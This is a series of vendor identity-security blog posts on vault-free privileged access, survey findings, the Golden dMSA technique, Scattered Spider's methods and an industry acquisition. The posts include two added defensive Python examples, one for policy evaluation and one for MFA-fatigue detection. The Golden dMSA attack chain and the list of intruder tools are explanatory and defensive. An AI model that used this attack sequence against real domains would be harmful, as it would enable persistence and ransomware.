- It creates a false sense of security. Security teams often assume that rotating credentials and limiting access to the vault is enough. But if the password is still being handed to the user—even for a short time—it can still be exfiltrated or abused. The security controls (like MFA, session recording, or approval workflows) are tied to the vault, not to the privileged access itself. Once the login is done, there is no additional enforcement point to apply security controls.

Vault-centric PAM worked well in the era of static infrastructure and long-lived accounts. But today’s IT environments are dynamic, distributed, and identity-driven. Simply protecting credentials in a vault is no longer enough.

### From privileged account management to privileged access security

The real opportunity—and what defines the vault-free future—is to shift from managing privileged accounts to securing privileged access.

In this model, organizations no longer rely on permanent accounts with vaulted passwords. Instead, privileges are granted dynamically, just-in-time, and removed as soon as they’re no longer needed. Access is brokered and monitored in real time based on user identity, context (device, location, time), and policy. This eliminates many of the risks associated with vault-based PAM:

- There is no standing credential to steal or reuse.
- The change to user behavior is minimal: no login disruption, and no password checkout process.
- All access is tightly monitored and tied to a verified identity.
- Even if the attacker gets hold of the password, the access is still secured and the attack can be stopped there.

This model also extends seamlessly to non-human identities (NHIs)—like service accounts, scripts, AI agents, and automation tools—which now make up the majority of privileged access in most organizations. Rather than managing thousands of long-lived credentials for these entities, organizations can enforce policies that allow specific systems to initiate privileged access under strict controls, without static secrets. As NHIs become more manageable through identity providers, cloud-native tools, and runtime enforcement, the vault-free approach becomes both more feasible and more secure.

### Identity-centric access: A more secure approach

This shift toward privileged access security is made possible by technological advances in identity security.
Organizations can now apply strong security controls at the identity layer—enforcing MFA, risk-based policies, session monitoring, and just-in-time elevation—without injecting credentials or modifying infrastructure. In fact, modern platforms can secure privileged access in a way that’s:

- Proxyless – doesn’t require routing all network traffic through a gateway or rewriting apps.
- Credential-free – avoids injecting or exposing privileged credentials.
- Inline and real-time – dynamically responds to access attempts with adaptive policy decisions.

This architectural shift allows organizations to apply Zero Trust principles to privileged access—validating every request continuously, applying least-privilege policies, and responding to anomalies instantly.

And it aligns with how security teams want to work: reducing the attack surface, minimizing user disruption, and simplifying operations.

## Will vaults disappear?

Vaults will remain part of the privileged access landscape for the foreseeable future. Some systems will continue to require passwords. Some compliance requirements will mandate secure storage of credentials. And in certain break-glass or legacy scenarios, having a vault as a fallback mechanism still makes sense.

But vaults will no longer be the primary way organizations secure privileged access. Instead, the center of gravity will shift to real-time, identity-aware controls—a model that doesn’t rely on handing users credentials, and doesn’t require those credentials to exist in the first place.

We’re already seeing this transition unfold. Modern identity security platforms are being used to enforce granular access controls for privileged sessions across cloud and on-prem environments. These controls—based on who the user is, what resource they’re accessing, and under what context—are more precise, more scalable, and more secure than vault-based approaches.
And importantly, they’re faster to deploy and easier to manage, because they don’t require users to change how they log in or IT teams to redesign their environments.

## Looking ahead

The future of privileged access is vault-free. Vaults served a critical function in an earlier era. But as identity becomes the new perimeter, and access becomes the control point, it’s time to move on.

Security leaders who want to reduce risk, accelerate zero trust adoption, and simplify their operational burden should begin by asking: Do I need to protect this password, or can I eliminate it altogether?

By shifting the focus from accounts to access, we can finally secure identities in a way that’s invisible to users, resistant to breaches, and built for the dynamic environments of today—and tomorrow.

Learn more about Privileged Access Security and how it benefits identity and security teams.

---

- Published: 2025-08-13
- Modified: 2025-08-18
- URL: https://www.silverfort.com/blog/esg-research-reveals-importance-of-identity-security-consolidation/

Read the latest identity security research from Enterprise Strategy Group (ESG), unveiling key trends and investment plans.

Enterprise Strategy Group (ESG) Principal Analyst Todd Thiemann released his latest research on identity security, titled “Identity Security at a Crossroads: Balancing Stability, Agility, and Security.” The findings make one conclusion clear: with identity security growing more complex, teams believe consolidating capabilities into a single platform is a must to ensure visibility into what employees and non-human identities are accessing, acting on, and connecting to within their environments.

Todd opens the report with the following note to readers: “Workforce identity security is in a state of flux, with changing enterprise infrastructure, an expanding application portfolio to integrate, and sprawling cloud deployments that are exposing unsolved problems, inefficient processes, and fragmented solutions.”

Through the study, ESG surveyed 370 IT and cybersecurity decision-makers across multiple industries, mostly from organizations with 1,000 or more employees. The goal of this research is to identify and quantify major pain points for leaders managing identity security in their organizations and uncover trends that show how they plan to tackle those concerns. In this blog, we’ll unpack key findings from the research and explain what they mean for organizations’ shifting priorities.

Ready to skip straight to the research? Download the Report here.

## 70% of teams plan to expand usage of an existing tool to cover a new use case in the next 12-18 months

In addition to organizations expanding usage of existing tools, 62% of organizations plan to implement a net new tool to satisfy a use case, hinting that current solutions may be inadequate for evolving priorities. We’ll get into what those “evolving priorities” are later, but in the meantime it’s important to unpack the desire to consolidate or adopt new tools.

## Identity security teams need to evolve their existing tool stack to meet changing cybersecurity needs

In the study, participants were asked “What identity solutions are currently in use or expected to be in the next 12-24 months?” Across 18 functional areas including MFA, NHI security, ITDR, and more, nearly half of organizations reported that they use multiple solutions for each. In fact, identity teams “use an average of 11 tools, and the proliferation of tools leads to operational complexity, poor visibility, and identity silos.” If you’re an identity security practitioner looking for an MFA solution (as an example), ESG research shows that 46% of teams aren’t just using one tool for MFA, they’re using multiple. Add in the complexity of 18 functional areas to satisfy? The idea of “tool sprawl” doesn’t even begin to cover what teams have been working with.

What factors drive the tool sprawl?
- 52% report that cloud adoption plays a factor
- 51% cite cyber insurance requirements
- 48% note that they need separate tools for separate environments (like on-prem versus cloud)
- The list continues on page eight of the report

With 46% of organizations managing anywhere from 500-2,499 business applications, consolidation is now a necessity. With a unified identity security platform, teams can gain the comprehensive visibility they need, uncover powerful context across the organization, and make insight-based decisions made possible by having the full picture.

## 67% of teams are concerned about NHI security, while 52% believe AI agent adoption raises data privacy issues

Non-human identities include identities like service accounts and API keys. While teams are concerned about securing NHIs, very few have deployed an NHI-specific security tool. Instead, 77% of them are choosing identity security or IAM platforms to tackle NHI security. Again, enterprise identity security teams demonstrate that folding NHIs into their entire identity security strategy rather than selecting a point solution leads to stronger security outcomes.

## The growth of agentic AI raises cybersecurity concerns, such as data privacy

Teams report that securing AI agents is now on their radar, too. Data privacy is the top concern, but other sources of uneasiness around AI agents include “Failure of human oversight” and “Control of AI agents falling into adversary hands.” The truth is, AI agents are not machines, nor are they human. They lie somewhere in between and therefore need to be treated as their own category of identity. An AI agent security solution needs to address these concerns, so every AI agent is tied to a human and has the proper policies in place to prevent (and detect) improper activity.
## Identity security investment will keep growing—get the research to learn more

91% of organizations surveyed consider identity security one of their top five priorities in the next 12-24 months, with 42% saying it is the number one priority. As areas like AI agent security, ITDR, and ISPM become critical to an organization’s overall identity security strategy, teams need to consider how to balance a growing number of focus areas alongside having the right tools to provide the full context needed to make informed decisions for the business.

As ESG's research uncovers, tool consolidation offers a path to accomplish those goals, with identity security platforms offering the highest chance of meeting the desired outcomes. In fact, a top motivator for many participants (24%) to evolve their existing identity security portfolios was “cost savings because of vendor consolidation,” validating that this approach saves money while optimizing resource utilization.

Download the complete research today to see how your identity security peers are tackling top concerns and where they plan to invest to achieve their goals in 2025 and beyond.

---

- Published: 2025-08-07
- Modified: 2025-08-07
- URL: https://www.silverfort.com/blog/stopping-golden-dmsa-attacks-before-they-start/

Microsoft’s recent research spotlights a dangerous post-exploitation technique called Golden dMSA. This new attack method abuses SYSTEM-level access on domain controllers to execute persistent payloads, including ransomware that targets the core of Active Directory. By hijacking delegated Managed Service Accounts (dMSAs), attackers can gain access without needing to compromise traditional credentials.

Originally introduced in Windows Server 2025, delegated Managed Service Accounts (dMSAs) are a major advancement in service account security.
While static password-based accounts remain susceptible to Kerberoasting attacks, dMSAs shift the authentication model by binding access directly to verified machines in Active Directory (AD).

This machine-centric approach eliminates credential theft by tying access to device identity rather than user-managed passwords, ensuring that only explicitly authorized machines can leverage the account. However, when abused in post-exploitation scenarios, dMSAs can be used by attackers to execute malicious code from within trusted, high-privilege infrastructure.

In this blog, we will break down how the Golden dMSA attack flow works, why it poses multiple risks, and how organizations can secure machine identities before attackers do.

## What is Golden dMSA?

Golden dMSA is a post-exploitation technique that allows attackers to gain long-term access in Active Directory (AD) environments by generating valid passwords for delegated Managed Service Accounts (dMSAs) and group Managed Service Accounts (gMSAs).

This method becomes viable after the attacker has already gained privileged access, such as Domain Admin or SYSTEM-level permissions on a domain controller. From there, they can take advantage of a flaw in the way these service account passwords are generated. The process includes predictable, time-based elements with limited variability, making it easy to reverse-engineer and reproduce the correct passwords.

Attackers can then generate credentials offline and impersonate critical service accounts across the domain, bypassing normal security controls and password rotation mechanisms.

## How a Golden dMSA attack unfolds

A Golden dMSA attack typically begins after an attacker gains a foothold in the environment and escalates privileges. From there, the method enables covert persistence and extensive lateral movement across Active Directory. This is how a typical Golden dMSA attack occurs:

1. Initial access and privilege escalation. The attacker compromises a system within the domain and escalates to Domain Admin or SYSTEM-level access on a domain controller, often through phishing, credential theft, or exploiting misconfigurations.
2. Extraction of the KDS root key. With privileged access, the attacker extracts the Key Distribution Services (KDS) root key, a critical cryptographic secret used by Active Directory to generate passwords for managed service accounts.
3. Service account enumeration. The attacker identifies delegated Managed Service Accounts (dMSAs) and group Managed Service Accounts (gMSAs) across the forest. This typically involves querying for account names and associated identifiers using LDAP or other directory tools.
4. Offline password generation. Due to a weakness in the password generation algorithm, the attacker can brute-force the values and generate valid passwords using tools like Golden dMSA, without triggering alerts.
5. Post-exploit impact: SYSTEM-level ransomware deployment. With credentials for service accounts in hand, the attacker can re-enter the domain controller and operate with SYSTEM-level privileges. From here, they can:
   - Tamper with core processes like LSASS (e.g., for further credential dumping or injection).
   - Deploy ransomware from a central, high-trust machine with domain-wide access.
   - Move laterally to other systems and infrastructure.

This stage of the attack is crucial because ransomware executed from a domain controller typically carries broad domain trust and can spread rapidly. Most EDR solutions have limited visibility into SYSTEM-level operations, especially on domain controllers. To make matters worse, service account activity often goes undetected by standard security solutions.

Source: Hacker News

## How Golden dMSA bypasses traditional security solutions

Golden dMSA is particularly dangerous not because it breaks in, but because of what it can do after gaining access.
Because it is a post-exploitation technique, by the time it is executed on the targeted domain controller, most security solutions are already out of scope.

Detection becomes especially difficult because attackers operate using legitimate credentials and elevated privileges. Once the attacker gains SYSTEM-level access, common security tools like EDR and antivirus struggle to provide visibility or enforce controls in those privileged contexts.

Lateral movement also blends in with normal admin activity, making it hard to differentiate malicious actions from routine domain operations. Since no malware or exploits are necessarily involved at this stage, signature-based or behavior-based detection systems may not trigger alerts at all.

In short, once attackers are inside the perimeter and leveraging Golden dMSA, the usual security layers offer little resistance, making early detection and privilege boundary hardening critical.

## Silverfort's Golden dMSA prevention approach

Even in post-exploitation scenarios like Golden dMSA, where traditional security tools often fall short, Silverfort protects direct and indirect access to domain controllers with MFA and strict real-time access policy enforcement that actively stops attackers from progressing inside the environment.

### Enforcing MFA for admin access to domain controllers

Silverfort enables organizations to enforce MFA on any access attempt to domain controllers, including:

- Remote Desktop Protocol (RDP) sessions
- PsExec executions
- SMB file share access

By enforcing MFA at traditionally unprotected access points such as RDP and PsExec, Silverfort can require users to verify their identity with MFA, which helps prevent an attacker from moving laterally across an environment. This disrupts the attacker’s ability to leverage Golden dMSA-generated credentials for privileged access, effectively halting progression even after initial compromise.
Figure: Policy enforcing MFA on DC access via RDP or PsExec

### MFA protection on direct Windows logins to domain controllers

Silverfort provides the ability to enforce MFA on all interactive logins to domain controllers, including:

- Local console logins
- Remote Desktop Protocol (RDP) sessions
- Any direct login using valid domain credentials

By enforcing MFA at these critical access points, Silverfort prevents unauthorized access to domain controllers even if attackers possess valid credentials. This capability is especially important in scenarios involving credential-based attacks like Golden Ticket, Pass-the-Hash, or lateral movement. Requiring MFA at the moment of login disrupts the attack chain early, turning domain controllers from high-risk targets into secure endpoints.

Figure: Silverfort policy enforcing MFA on interactive DC logins

### Real-time access enforcement

Silverfort performs real-time analysis of authentication traffic across the environment, correlating signals from user identity, device posture, access protocol, and behavioral patterns. This enables precise enforcement decisions at the identity layer, allowing you to:

- Block unauthorized or misused access paths to critical systems like domain controllers, even if valid credentials are used.
- Detect tool-based anomalies such as unexpected use of PsExec, PowerShell, or other lateral movement utilities by analyzing deviations from known admin behavior baselines.
- Disrupt lateral movement early by enforcing access policies that adapt to risk context, preventing escalation before attackers reach sensitive targets.

Figure: Access block triggered by suspicious authentication

### Virtual fencing to stop lateral movement

Silverfort can apply virtual fencing capabilities not just to users, but also to non-human identities. These policies establish explicit access boundaries, restricting movement based on the identity type (user or service account), its role, and contextual factors such as source system, access method, and protocol.
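As an added example (not Silverfort code), the evaluator below shows how the two kinds of policy described in this section, per-service-account fences and MFA on admin-tool access to domain controllers, can be expressed and applied to authentication events; the event fields, host and account names, and the policy schema are all assumptions made for the illustration.

```python
"""Identity-layer virtual fencing over constructed authentication events.

Added illustration, not Silverfort code: the event fields, host names, account
names and policy schema are all assumptions made for this example.
"""
from dataclasses import dataclass, field

DOMAIN_CONTROLLERS = {"DC01", "DC02"}              # assumed tier-0 hosts
ADMIN_ACCESS_METHODS = {"RDP", "PsExec", "SMB"}    # DC access paths named in the post


@dataclass(frozen=True)
class AuthEvent:
    account: str          # service accounts use the AD "name$" convention
    source: str           # host the authentication originated from
    target: str           # host being accessed
    method: str           # RDP, PsExec, SMB, Kerberos-service, ...
    mfa_passed: bool = False


@dataclass
class FencePolicy:
    """Where a non-human identity may run, what it may reach, and how."""
    allowed_sources: set = field(default_factory=set)
    allowed_targets: set = field(default_factory=set)
    allowed_methods: set = field(default_factory=set)


# Constructed fence table: each service account is pinned to the machines it
# is expected to authenticate from and the systems it is expected to reach.
SERVICE_ACCOUNT_FENCES = {
    "svc-backup$": FencePolicy({"BACKUP01"}, {"FS01", "FS02"}, {"SMB"}),
    "svc-sql$": FencePolicy({"SQL01"}, {"SQL01"}, {"Kerberos-service"}),
}

# Constructed tiering for human users: the only targets each may reach.
HUMAN_ALLOWED_TARGETS = {
    "alice.admin": {"DC01", "DC02", "FS01"},   # tier-0 administrator
    "bob": {"FS01", "WS-BOB"},                 # regular user, no DC access
}


def is_service_account(account: str) -> bool:
    return account.endswith("$")


def evaluate(ev: AuthEvent) -> str:
    """Decide 'allow', 'deny' or 'mfa' for one authentication event.

    Valid credentials are assumed throughout: the decision rests only on who
    is authenticating, from where, to what, and over which access method.
    """
    if is_service_account(ev.account):
        fence = SERVICE_ACCOUNT_FENCES.get(ev.account)
        if fence is None:
            return "deny"   # no fence defined for this NHI: fail closed
        inside_fence = (ev.source in fence.allowed_sources
                        and ev.target in fence.allowed_targets
                        and ev.method in fence.allowed_methods)
        return "allow" if inside_fence else "deny"

    if ev.target not in HUMAN_ALLOWED_TARGETS.get(ev.account, set()):
        return "deny"       # outside the user's tier
    if ev.target in DOMAIN_CONTROLLERS and ev.method in ADMIN_ACCESS_METHODS:
        # Admin-tool access to a DC is permitted for this user, but only after
        # a fresh MFA verification at the moment of access.
        return "allow" if ev.mfa_passed else "mfa"
    return "allow"


def evaluate_batch(events):
    """Return (account, source, target, decision) for each event."""
    return [(ev.account, ev.source, ev.target, evaluate(ev)) for ev in events]


# Constructed sample events, including the misuse patterns the post describes.
SAMPLE_EVENTS = [
    AuthEvent("svc-backup$", "BACKUP01", "FS01", "SMB"),         # normal backup job
    AuthEvent("svc-backup$", "WS-BOB", "DC01", "SMB"),           # service account used from a workstation toward a DC
    AuthEvent("alice.admin", "JUMP01", "DC01", "PsExec"),        # admin tool to DC, MFA not yet passed
    AuthEvent("alice.admin", "JUMP01", "DC01", "PsExec", True),  # same access after MFA
    AuthEvent("bob", "WS-BOB", "DC01", "RDP"),                   # regular user toward a DC
    AuthEvent("svc-unknown$", "DC01", "FS02", "SMB"),            # NHI with no fence defined
]

if __name__ == "__main__":
    for row in evaluate_batch(SAMPLE_EVENTS):
        print(row)
```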
Unlike traditional network segmentation, which lacks visibility into identity context, Silverfort enforces policy at the authentication layer. This enables real-time enforcement that blocks credential-based movement, even when attackers are using legitimate credentials or SYSTEM-level privileges.

Silverfort’s approach ensures:

- Human users are only able to access the systems and workloads explicitly assigned to them, eliminating blanket access between domain-joined machines.
- Service accounts, including dMSAs, gMSAs, and other non-human identities, are governed by virtual fencing protection policies that define which machines, services, or apps they are allowed to interact with. Any unauthorized service-to-service access attempts are denied outright.
- Lateral movement, whether through interactive tools (RDP, PsExec) or automated processes (scheduled tasks, service start-ups), is evaluated in real time and blocked unless it aligns with predefined policy.

Figure: Service account policy

By enforcing these controls in identity and authentication flows, Silverfort eliminates blind spots where service accounts and privileged users traditionally move unchecked, reducing lateral movement risk even in fully compromised privileged environments.

## Stopping lateral movement starts at the authentication layer

Golden dMSA is a reminder that no perimeter is inherently secure and that attackers will exploit any opportunity they are given. The real challenge is what happens next, especially when they reach domain controllers with SYSTEM-level access.

That is why real-time identity enforcement needs to be at the forefront to ensure protection. To defend against post-exploitation techniques, organizations need to apply security controls at the authentication layer, not just the endpoint or network.

Silverfort makes this possible.
By enforcing least privilege, monitoring authentication in real time, and controlling both user and service account access, Silverfort prevents lateral movement and service abuse—even when credentials are legitimate.

Learn how to defend against Golden dMSA and other identity-based attacks by scheduling a call with one of our identity security experts.

---

- Published: 2025-08-06
- Modified: 2025-08-08
- URL: https://www.silverfort.com/blog/into-the-spider-verse-qantas-scattered-spider-and-what-australian-teams-should-learn/

As both a Qantas Frequent Flyer and a cybersecurity professional based in Sydney, I felt the impact of the airline’s June 2025 breach personally. The breach was the result of attackers accessing a third-party customer service platform operated by an overseas call centre, and it exposed the personal data of approximately 5.7 million customers, myself included. While the breach did not directly threaten imminent financial loss, it does significantly increase the risk of secondary attacks using the leaked personal data.

The breach showed no signs of ransomware or sophisticated payloads. Instead, it bore the hallmarks of Scattered Spider, a threat group that relies on social engineering, abuse of legitimate credentials, and lateral movement through protocols that evade traditional security controls. This incident is yet another proof point that identity has become one of the top attack vectors, especially across the hybrid IT environments that dominate Australian enterprises and their supply chains. These environments blend cloud, on-prem, and vendor-operated systems, but lack unified identity control, making detection and response much harder.

In this blog, we’ll explain who Scattered Spider is and why Australia is a growing target, the methods they use and why they are so effective, and the tactical steps Australian security teams can take to prevent and respond to identity-based attacks.

## Who is Scattered Spider, and why are they targeting Australia?
Scattered Spider (aka UNC3944, Scatter Swine, Octo Tempest, Starfraud, Muddled Libra) is a financially motivated cybercriminal group focused on identity as the main attack vector. Active since at least 2022, and reportedly composed primarily of young, native English speakers from the US and the UK, the Scattered Spider group rarely uses malware or ransomware, and targets some of the most defended sectors, such as financial services and gaming. Their toolkit often doesn't rely on code; rather, it relies on confidence tricks, protocol gaps, and our basic assumptions about trust. Common techniques include:

- Phishing, smishing and vishing: Camouflaged emails/SMS or phone calls impersonating IT or help desk staff to trick staff into providing PII or credentials, or performing MFA resets.
- Help desk impersonation: Often posing as internal IT or help desk staff to direct employees to perform unsafe activities, such as running remote access tools or sharing MFA codes.
- MFA fatigue: Spamming users with push notifications until they click "approve".
- SIM swapping: Hijacking phone numbers to receive MFA codes.
- Living off the land: Using PowerShell, PsExec, and RDP or commercial remote-access utilities (such as TeamViewer, Ngrok, ScreenConnect, Fleetdeck, etc.), tools already available inside every enterprise, to move laterally and evade detection.
- Compromising hypervisors: More recently, attacks have escalated beyond Active Directory compromise to directly targeting and manipulating VMware ESXi infrastructure, enabling attackers to bypass certain controls, such as endpoint protection, entirely.

While their initial focus was on US-based casinos, insurers, and retailers, 2024-2025 has seen them pivot sharply toward aviation, logistics, and infrastructure in Australia.

## Why Australia?

1. Widespread hybrid and fragmented identity infrastructure. Australian enterprises commonly rely on a mix of on-prem Active Directory, cloud identity providers (e.g., Entra ID, Okta), SSO platforms, and PAM tools. While each secures a slice of the environment, they often operate in silos, leading to visibility gaps and incomplete control enforcement. This creates ideal conditions for identity-based attackers to slip through the cracks.
2. Complex and diverse identity and IT ecosystems. Australian enterprises are typically early adopters of technology and have gone through multiple waves of digital transformation and productivity-enhancing outsourcing. Over time, this has led to a highly interconnected ecosystem of third-party vendors, partners, and contractors, each requiring access to different parts of the enterprise. The result is a sprawling identity landscape with countless potential entry points to secure.
3. High-value customer data in a regulatory and reputational powder keg. Australian enterprises operate under increasingly demanding privacy and cybersecurity regulations, including the Notifiable Data Breaches scheme and evolving critical infrastructure mandates. At the same time, they store vast volumes of high-value personal data, such as financial, health, and identity records, which are lucrative targets for extortion, resale, or impersonation. These dual pressures make breaches more damaging and responses more urgent, amplifying the impact of identity-based attacks.

## How to prevent identity threats before they start

### 1. Harden the help desk, but don’t over-rely on it

Problem: Scattered Spider often gains initial access through social engineering, targeting real human beings. This is especially effective in help desk environments, where staff are under pressure to resolve issues quickly and maintain high customer satisfaction. These attacks exploit human trust and judgment, making them difficult to consistently prevent.

Solution: Help desk procedures should be strengthened and reviewed regularly, but controls must extend beyond initial access.
Attackers like Scattered Spider exploit legacy trust models that assume anything inside the perimeter is legitimate. Identity-layer segmentation, especially in Active Directory, is critical to slowing attackers and limiting the blast radius. Privileged identities should be blocked from accessing non-privileged environments (and vice versa), and third-party suppliers should only access what they need. A tiering model can further separate identities and systems by business criticality and risk.

### 2. Close MFA gaps in legacy protocols

Problem: Protocols like NTLM, LDAP, and SMB don’t natively support MFA, and attackers know it. These gaps are frequently exploited to bypass modern access controls.

Solution: Extend MFA enforcement to cover all Active Directory protocols, including legacy ones, to ensure attackers can’t sidestep protections. While eliminating these vulnerable protocols entirely isn’t always feasible, restricting their use to only the systems that absolutely require them is both practical and impactful.

### 3. Implement phishing-resistant authentication methods (e.g. passkeys and FIDO2)

Problem: SMS-based MFA and push fatigue are easily bypassed with social engineering or SIM swapping.

Solution: Adopt phishing-resistant methods like FIDO2 hardware keys or platform passkeys for privileged users and critical systems. These provide cryptographic proof of possession and can’t be phished or replayed.

### 4. Detect and block lateral movement in real time

Problem: After initial access, attackers "live off the land" using RDP, PowerShell, and legitimate credentials, which go undetected in most hybrid environments.

Solution: Continuously monitor authentication flows across on-prem and cloud identity infrastructure to identify unusual movement patterns between systems, and trigger inline MFA or deny access before the attacker escalates privileges.

### 5. Protect non-human identities

Problem: These accounts are often numerous, highly privileged, invisible in day-to-day operations, and poorly secured, making them ideal attack vectors or targets for abuse.

Solution: Begin by establishing a comprehensive inventory of non-human identities, including service accounts, automation credentials, and machine identities. Continuously monitor their behaviour for unusual access patterns, restrict their use to only what’s necessary, and apply least-privilege permissions. This must be done in a way that is automated, scalable, and grounded in operational context. Spreadsheets, manual reviews, and reliance on tribal knowledge simply do not scale in modern enterprise environments.

### 6. Contain fast without stopping business, before you know what's compromised

Problem: In identity attacks like Scattered Spider's, response delays let the attacker move laterally, disable logging, or escalate privileges, all using valid credentials.

Solution: Define and prepare containment policies in advance, so they can be activated instantly to block compromised accounts, trigger reauthentication, or isolate specific systems. These policies should be designed with resilience in mind, limiting attacker movement while minimising impact on business operations. Preparation also means productivity is not affected in case of a breach. Consider using phishing-resistant MFA as a mediator to improve cyber resilience, so that legitimate authorised users can continue to be productive and deliver services while attackers' ability to achieve their objectives is hampered.

## When the breach happens: Identity-first incident response

Even with the best defences, compromise can still happen. What matters most is what you do in the initial hours. For example, requiring MFA for high-risk actions helps contain threats without disrupting core business operations.
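As an added example, not from the original post, here is how the MFA-fatigue pattern described earlier can be spotted in push-MFA logs and turned into the pre-prepared, staged containment this post recommends (deny first, then relax to MFA with elevated monitoring, and isolate the machines the affected accounts came from); the log format, thresholds, user names and addresses are constructed assumptions.

```python
"""MFA push-fatigue detection and staged containment over constructed log lines.

Added illustration, not Silverfort code: the log format, the burst threshold
and window, and every user name and address below are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed push-MFA log: "<ISO time> user=<name> result=<approved|denied|timeout> src=<ip>"
SAMPLE_LOG = """\
2025-06-30T09:00:05Z user=jane.doe result=approved src=203.0.113.10
2025-06-30T22:10:01Z user=tom.lee result=denied src=198.51.100.7
2025-06-30T22:10:33Z user=tom.lee result=denied src=198.51.100.7
2025-06-30T22:11:04Z user=tom.lee result=timeout src=198.51.100.7
2025-06-30T22:11:40Z user=tom.lee result=denied src=198.51.100.7
2025-06-30T22:12:15Z user=tom.lee result=denied src=198.51.100.7
2025-06-30T22:13:02Z user=tom.lee result=approved src=198.51.100.7
2025-06-30T22:30:00Z user=ann.ng result=denied src=192.0.2.44
2025-06-30T22:45:00Z user=ann.ng result=approved src=192.0.2.44
"""

WINDOW = timedelta(minutes=10)   # assumed: pushes this close together form one burst
BURST_THRESHOLD = 4              # assumed: pushes per window that count as fatigue


def parse(log_text):
    """Return (timestamp, user, result, src) tuples from the constructed log format."""
    events = []
    for line in log_text.strip().splitlines():
        ts, *pairs = line.split()
        fields = dict(pair.split("=", 1) for pair in pairs)
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                       fields["user"], fields["result"], fields["src"]))
    return events


def detect_fatigue(events):
    """Map user -> 'suspect' or 'compromised'.

    A burst of BURST_THRESHOLD or more pushes inside WINDOW, most of them not
    approved, is a fatigue attempt ('suspect'); an approval arriving inside
    such a burst is the signature of a successful one ('compromised').
    """
    by_user = defaultdict(list)
    for ts, user, result, _src in events:
        by_user[user].append((ts, result))
    verdicts = {}
    for user, pushes in by_user.items():
        pushes.sort()
        for i, (start, _) in enumerate(pushes):
            window = [r for t, r in pushes[i:] if t - start <= WINDOW]
            if len(window) < BURST_THRESHOLD:
                continue
            if sum(r != "approved" for r in window) < BURST_THRESHOLD - 1:
                continue   # mostly approvals: a busy user, not a fatigue burst
            if "approved" in window:
                verdicts[user] = "compromised"
                break
            verdicts[user] = "suspect"
    return verdicts


def containment_policy(verdicts, all_users, stage):
    """Per-user access policy for the 'contain' and 'recover' stages.

    contain: compromised accounts are denied outright, everyone else gets MFA.
    recover: deny is replaced by MFA, with elevated monitoring kept on any
             account that was flagged during containment.
    """
    policy = {}
    for user in all_users:
        verdict = verdicts.get(user)
        if stage == "contain":
            policy[user] = "deny" if verdict == "compromised" else "mfa"
        else:
            policy[user] = "mfa+monitor" if verdict else "mfa"
    return policy


def hosts_to_isolate(events, verdicts):
    """Source addresses seen for compromised accounts: candidates for isolation."""
    return {src for _ts, user, _r, src in events
            if verdicts.get(user) == "compromised"}


if __name__ == "__main__":
    evs = parse(SAMPLE_LOG)
    found = detect_fatigue(evs)
    users = {user for _ts, user, _r, _src in evs}
    print(found)
    print(containment_policy(found, users, "contain"))
    print(containment_policy(found, users, "recover"))
    print(hosts_to_isolate(evs, found))
```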
Here's a streamlined response framework built for identity-based breaches:

Containment

- Enforce deny or MFA policies instantly on all users
- Identify compromised accounts based on MFA violations or unusual access
- Isolate machines where affected accounts logged in

Recovery

- Gradually replace deny with MFA to restore access
- Reintroduce critical services in controlled phases
- Maintain elevated monitoring of previously compromised accounts

Remediation

- Trace how the attacker moved between systems using authentication logs, and identify the specific identity weaknesses (like misconfigurations or excessive privileges) that enabled that movement
- Use those insights to strengthen long-term identity security posture

## Final thoughts: Australia can lead in identity resilience

The Qantas incident wasn't a one-off. It was a warning flare that identity-based attacks, like those used by Scattered Spider, are here, active, and evolving. As a local citizen caught in the blast radius, I believe we can meet this moment with urgency and confidence.

Australia’s hybrid identity infrastructure and IT ecosystem are complex, but with the right plan, that complexity can be protected, monitored, and controlled. Phishing-resistant MFA and well-defined access policies across all access points including legacy protocols, limiting access based on least privilege and business criticality, and identity-first incident response can contain threats quickly while keeping business operations running.

Australia doesn’t have to wait for another breach to act. We can lead.

To learn more about how to build an incident response playbook against threat groups like Scattered Spider, I invite you to watch this webinar on-demand.

---

- Published: 2025-08-06
- Modified: 2025-08-07
- URL: https://www.silverfort.com/blog/what-the-future-holds-for-identity-security-after-cyberarks-acquisition-by-palo-alto-networks/

Last week, Palo Alto Networks announced its intention to acquire CyberArk for $25B.
This is Palo Alto Networks’ first move into the identity security market, and given the size of the reported transaction, it’s a bold and strategic one. Here at Silverfort, we’ve seen firsthand that identity has become the new perimeter, and the only remaining line of defense for enterprises, both on-prem and in the cloud. This becomes even more true in the AI era. As such, securing identities requires taking a similar approach to what we’ve seen in other areas of cybersecurity like endpoint security or cloud security. It requires a comprehensive platform that enables unified visibility, intelligence, and active protection capabilities. It’s time to move beyond point solutions like PAM, MFA, NHI, CIEM, ITDR or ISPM – and adopt a consolidated approach that solves this problem end to end.

Where does identity security go from here, now that one of the largest cybersecurity companies in the world is making it a priority? In this blog, I’ll share some of my thoughts about this pivotal moment and what the future holds for identity security.

## Why is Palo Alto Networks making such a strategic investment in identity security?

In Palo Alto Networks’ press release, the company states that this acquisition means “establishing Identity Security as a new core platform”. In addition, CEO Nikesh Arora says: “Our market entry strategy has always been to enter categories at their inflection point, and we believe that moment for Identity Security is now... Today, the rise of AI and the explosion of machine identities have made it clear that the future of security must be built on the vision that every identity requires the right level of privilege controls, not the ‘IAM fallacy’.”

Let’s go through each of these key points:

The moment for identity security is now: According to research from analyst Francis Odum, 93% of breaches are preventable through improved identity security controls.
After years of investing heavily in areas like endpoint, network and cloud security, many organizations now realize that identity security was left behind, with legacy technologies and point solutions, and identity has become the weakest link. An example is the recent attacks on the UK retail sector, which stemmed from a known ransomware group exploiting identities and then moving laterally within targeted environments. Identity creates a sprawling attack surface, but with modern technologies and a platform approach, comprehensive security is finally possible.

**The rise of AI:** IBM’s 2025 Cost of a Data Breach report states that 63% of organizations lack AI governance policies. Various teams across the organization are spinning up new AI tools and feeding them with sensitive information, without any real cybersecurity oversight. Outside of human users leveraging AI tools, agentic AI creates an even bigger security challenge. AI agents can’t be protected the same way as humans, but they also don’t behave like the old and predictable “machine identities” that vendors have been working to secure in recent years, meaning they need an entirely different type of protection. The key to securing AI agents lies in treating them as their own category of identity, with dedicated security controls that are designed for addressing their unique nature, and providing the necessary visibility, risk analysis, and access control.

**Explosion of machine identities:** Non-human identities (NHIs) like API keys, tokens and service accounts outnumber human users by at least 50:1 in large enterprises, and 80% of those identities have major security posture issues that leave organizations susceptible to common attack techniques. Further, according to our research, only 5.7% of surveyed organizations believe they have good visibility into their non-human identities.
Mapping, analyzing and protecting non-human identities is now a top priority for enterprises, and new technologies finally make it possible to achieve it at scale.

